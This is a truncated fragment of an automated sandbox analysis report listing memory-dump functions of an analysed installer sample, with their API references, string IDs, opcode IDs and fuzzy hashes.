                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              Similarity
                              • API ID: CloseErrorHandleLast__dosmaperr
                              • String ID:
                              • API String ID: 2583163307-0
                              • Opcode ID: 351e704abaa1bbc8a490b67d5fb42c0558803d22dbb52e94db847d809f72c799
                              • Instruction ID: 4e05c4068c12de0009e0707a4acdccee93cb5c716adbf720aa0f594ef1010e93
                              • Instruction Fuzzy Hash: 5C018E3371812006C31516399444BAD37FD4F9773CF3A4359EA9A87ED5DF68C84441D0

                              Control-flow Graph (rendered graph omitted; entry block 6c92110c-6c921117, internal calls only)
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction ID: fe54a227640389dcbe75b63b990a22dc2d324a13c0ac8b1657347b1b5b5825ae
                              • Instruction Fuzzy Hash: 50F0D6325226141BD7211A399C00BCA32A88F6337CF114715E4E492FC9CB7DD91AC6D1
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C916024
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C916064
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID:
                              • API String ID: 323602529-0
                              • Opcode ID: e83293587d1bba100bd6976ea059bf075730bf541328241382b95534f12cba7a
                              • Instruction ID: d0c6431159d93ef14d27b8fc31b155026a039a937e688f75c9cb9e167e0b2b69
                              • Instruction Fuzzy Hash: 59513771505B04DBD725CF25C989BE6BBF4BB04714F448A1CE4AA8BB91DB30F549CB81
                              APIs
                              • GetLastError.KERNEL32(6C946DF0,0000000C), ref: 6C91F4C2
                              • ExitThread.KERNEL32 ref: 6C91F4C9
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              Similarity
                              • API ID: ErrorExitLastThread
                              • String ID:
                              • API String ID: 1611280651-0
                              • Opcode ID: 52f770de5cc95f8d9af4ce2ca38357278edd83196b79ca792264582acd36cc9a
                              • Instruction ID: 9c308489fa51c7aeef5593705d7928ea51a4df5ea0670f719c5d812c2fe1658a
                              • Instruction Fuzzy Hash: 47F0C271A182099FDB04AFB1C40AAAE3B74FF61319F248549F11697B91CF38D905DF61
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              Similarity
                              • API ID: __wsopen_s
                              • String ID:
                              • API String ID: 3347428461-0
                              • Opcode ID: db54ec78f5d6ccec81b7709326d0c8ba445ffc9b583be83b2ba47437a73a664d
                              • Instruction ID: e5b8db04ee3620e2e7652d79ebca18c0797f12a695519f7fcef5ac22bb8c524d
                              • Instruction Fuzzy Hash: 74113671A0420AAFCF05CF59E941EDB7BF8EF48318F154069F809AB341D671E915CBA4
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction ID: c3a592659b17d6092419bbf409c34df64d36ab6ba0ecadf0a3d5c7f6108a09f8
                              • Instruction Fuzzy Hash: 5B014472C1116DAFCF019FA88C019EE7FB5BF18214F154165F918E2550E731CA25DF91
                              APIs
                              • CreateFileW.KERNEL32(00000000,00000000,?,6C934685,?,?,00000000,?,6C934685,00000000,0000000C), ref: 6C9349E4
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: fa943e3e05c703937325169865cd4326a4bea7cf3002bdc7f8ec76cc543fd0c9
                              • Instruction ID: 0a532e60b825100aac7d2a23c8f7ba75c3a0584a1cbc72f31510f49efb136528
                              • Instruction Fuzzy Hash: D8D06C3210010DBBDF029E84DC06EDA3BAAFB48714F128000BA5896020C732E861AB90
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction ID: 5fe8300c8ed5e433bdef45a7f4a9467d10ab972675ab75f6afde86340aac0c95
                              • Instruction Fuzzy Hash:
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C9A84B1
                                • Part of subcall function 6C9A993B: __EH_prolog.LIBCMT ref: 6C9A9940
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Similarity
                              • API ID: H_prolog
                              • String ID: 1$`)K$h)K
                              • API String ID: 3519838083-3935664338
                              • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                              • Instruction ID: 26e8dd010756dba6b688ed09cca013d02652f4499045f039d78dc6d6bcec3a51
                              • Instruction Fuzzy Hash: 2EF27C30901258DFDB15CBA8C888BDDBBB9BF99308F2444D9E449AB751DB71DA86CF10
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C99AEF4
                                • Part of subcall function 6C99E622: __EH_prolog.LIBCMT ref: 6C99E627
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              Similarity
                              • API ID: H_prolog
                              • String ID: $h%K
                              • API String ID: 3519838083-1737110039
                              • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                              • Instruction ID: 757838c091e943d9c38023c4c8fde10d37a0d436b16236bd4ad3bf9b46539b21
                              • Instruction Fuzzy Hash: 15537A30901259DFDB25CBA4C994BEDBBB8AF29308F1840D8D449A7791DB34EE89CF51
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              Similarity
                              • API ID: H_prolog
                              • String ID: $J
                              • API String ID: 3519838083-1755042146
                              • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                              • Instruction ID: 7f71a029219922d3c82a72671d3cf8ed005546dc3f5aed8aeca5db9c06f3b9f5
                              • Instruction Fuzzy Hash: 59E2F071905289DFEF05CFE8C488BDDBBB8AF15308F248089E855AB781CB75D946CB61
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C976CE5
                                • Part of subcall function 6C94CC2A: __EH_prolog.LIBCMT ref: 6C94CC2F
                                • Part of subcall function 6C94E6A6: __EH_prolog.LIBCMT ref: 6C94E6AB
                                • Part of subcall function 6C976A0E: __EH_prolog.LIBCMT ref: 6C976A13
                                • Part of subcall function 6C976837: __EH_prolog.LIBCMT ref: 6C97683C
                                • Part of subcall function 6C97A143: __EH_prolog.LIBCMT ref: 6C97A148
                                • Part of subcall function 6C97A143: ctype.LIBCPMT ref: 6C97A16C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog$ctype
                              • String ID:
                              • API String ID: 1039218491-3916222277
                              • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                              • Instruction ID: e025b51bcc59ab6a3e43a2b105c04059d336d5a703c3217d9de2723d0bd53c91
                              • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                              • Instruction Fuzzy Hash: CA03BD30806288DEDF26CFA4C984BDCBBB5AF35308F2480D9D44567A91DB74DB89DB61
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: 3J$`/J$`1J$p0J
                              • API String ID: 0-2826663437
                              • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                              • Instruction ID: 069f92992e1d8763ad64554d3bc8772e0c8539f0d84617b5aebc3c60a04d4d7d
                              • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                              • Instruction Fuzzy Hash: CE41E872F10A601AF3488E7A8C855667FC3CBCD346B4AC23DD565C76D9DABDC40782A4
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: W
                              • API String ID: 3519838083-655174618
                              • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                              • Instruction ID: 68fb12527c217bbc874afa8bf5a9f8e42c36453e8a4eef52f25ecbf6646cc53f
                              • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                              • Instruction Fuzzy Hash: C5B27C74A05299DFDB01CFE8C588B9DBBB8AF4A308F244099E846EB751C775DD42CB60
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C99489B
                                • Part of subcall function 6C995FC9: __EH_prolog.LIBCMT ref: 6C995FCE
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @ K
                              • API String ID: 3519838083-4216449128
                              • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                              • Instruction ID: a7ee7c3241415aed2f086ad8ef9062760a387b7ddff6824aaf06819b02cf7bab
                              • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                              • Instruction Fuzzy Hash: B8D1CF31D012058FDB16CFA5C8907EEB7BABF94318F18816AE425ABA84DB70D885CF55
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: x=J
                              • API String ID: 3519838083-1497497802
                              • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                              • Instruction ID: c96105a6aebfb1d9b64edc42d3120d857faa995dceb84390473af78f1363d184
                              • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                              • Instruction Fuzzy Hash: A791E231D01109DBCF08DFA4C990AEDB7B9BF2930CF21C16AD452A7A51DB32DA49CB94
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                              • Instruction ID: dc7e0ad8811862e9f9ec9d219121b5043a2d682fe088985020abff71abc8db5d
                              • Opcode Fuzzy Hash: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                              • Instruction Fuzzy Hash: 21B29930904A59EFDB21CFA9C584B9FBBB5FF15308F104599D49AABA81DB30E985CF10
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: @4J$DsL
                              • API String ID: 0-2004129199
                              • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                              • Instruction ID: 63996e8bef8fee89974c3587c0378bfbdafdb976cab52d6638f85c0ee157398e
                              • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                              • Instruction Fuzzy Hash: 5F2171376A4D564BD74CCA68DC33EB92681E748305B89527EE94BCB7D1DF5DC800C648
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                              • Instruction ID: de4e61721b0e7522c1a42a4d7d893aebe60ef91d72bb7bbec4d9b9710a1417f8
                              • Opcode Fuzzy Hash: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                              • Instruction Fuzzy Hash: 0EF16A70901249DFCB58CFA4C590BEDBBB1BF15308F18806ED409ABB52DB70EA59CB51
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                              • Instruction ID: 11dcff5eebcb820174b298795a9308c76b924393befe86837cc05282828d283a
                              • Opcode Fuzzy Hash: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                              • Instruction Fuzzy Hash: 613249B1A083058FC318CF56C48495AF7E2BFCC314F468A5DE98997355DB74AA09CF86
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                              • Instruction ID: e7939163b790d693872f038847113df55851aa32d20b283d51962b45db9c8576
                              • Opcode Fuzzy Hash: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                              • Instruction Fuzzy Hash: 3612F7B29083158FC358DF4AD44045BF7E2BFC8714F1A8A6EE898A7311D770E9568B86
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: __aullrem
                              • String ID:
                              • API String ID: 3758378126-0
                              • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                              • Instruction ID: c0fc3a0d6deae0393c68c8cad1cddb81e2a73f449e873d9c41034a3531a66cb8
                              • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                              • Instruction Fuzzy Hash: 5251FB71A043859BD710CF5AC4C02EDFBF6EF79214F14C05DE8C897242D27A999AC760
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID: 0-3916222277
                              • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                              • Instruction ID: a0f54009e53fe4713c54cc8178d568bfdd67f363504410b3bc9402964365ed10
                              • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                              • Instruction Fuzzy Hash: F10299316083818BD325CF28C4907AEBBE2AFD9748F144A2DE4D597B51CB75DA49CB83
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                              • Instruction ID: 19ceb45c4d37035028b01a60d3de497f4a8b7b4efa0124a6fa96d8d3e4b2056f
                              • Opcode Fuzzy Hash: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                              • Instruction Fuzzy Hash: 39D13E729083148FC758DF4AD44005BF7E2BFC8314F1A892EF899A7315DB70A9568BC6
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: (SL
                              • API String ID: 0-669240678
                              • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                              • Instruction ID: 6a38d261c718f8134845048acbf225b7d463cba6d789c7007e4f40195ae78195
                              • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                              • Instruction Fuzzy Hash: F5518473E208214AD78CCE24DC2177572D2E788310F8BC1B99D8BAB6E6DD78989587D4
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                              • Instruction ID: 0a6e48802393948dc473b1e311aa14ae9726d3584afc78a3eaf863928dfc88b6
                              • Opcode Fuzzy Hash: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                              • Instruction Fuzzy Hash: D7728CB26042178FD748CF18C490269FBE1FF88314B5A46ADD95AEB742DB70E895CBC1
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                              • Instruction ID: dfbe15ed31eb21fb591859a8cca37dadbe80c57ecbc1a385c9808a67c97c3da1
                              • Opcode Fuzzy Hash: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                              • Instruction Fuzzy Hash: 86524D71708B858BD318CF29C5907AAB7E2BB95308F149A2DD4DAC7B41DB74F849CB42
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                              • Instruction ID: ded228576076c32b68fdd10e50189a4e23870a608d0b89bff7ac312e887e2727
                              • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                              • Instruction Fuzzy Hash: 576235B1A08B418FC714CF1AC48061AFBF5BFC8744F258A2EE899A7714DB70E945CB52
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                              • Instruction ID: 1b01735065467368a2593e7f3cd063743f0e389a68479b1a60c6cb697c4beaf7
                              • Opcode Fuzzy Hash: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                              • Instruction Fuzzy Hash: 90428071204B068BD328DF69C8907AAB3E2FB94304F058A2EE497D7B95D774F549CB81
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                              • Instruction ID: da023e83267c3eb05414aee838a90ff4789eea556d5d907a18321a41e0bc25b4
                              • Opcode Fuzzy Hash: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                              • Instruction Fuzzy Hash: FB129B713097428BC718CF29C5906AABBE2BFD8344F54892DE9D68BB41D731E945CB83
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                              • Instruction ID: 94eb85baca9e7eb6a30a102b258c6954b495b45d58c8020de54dfa1b7e3a3ed6
                              • Opcode Fuzzy Hash: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                              • Instruction Fuzzy Hash: FB02C673A08B5147D714CF298880239B7F3BBC0791F5B862EF89657794DAB0E946CB81
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
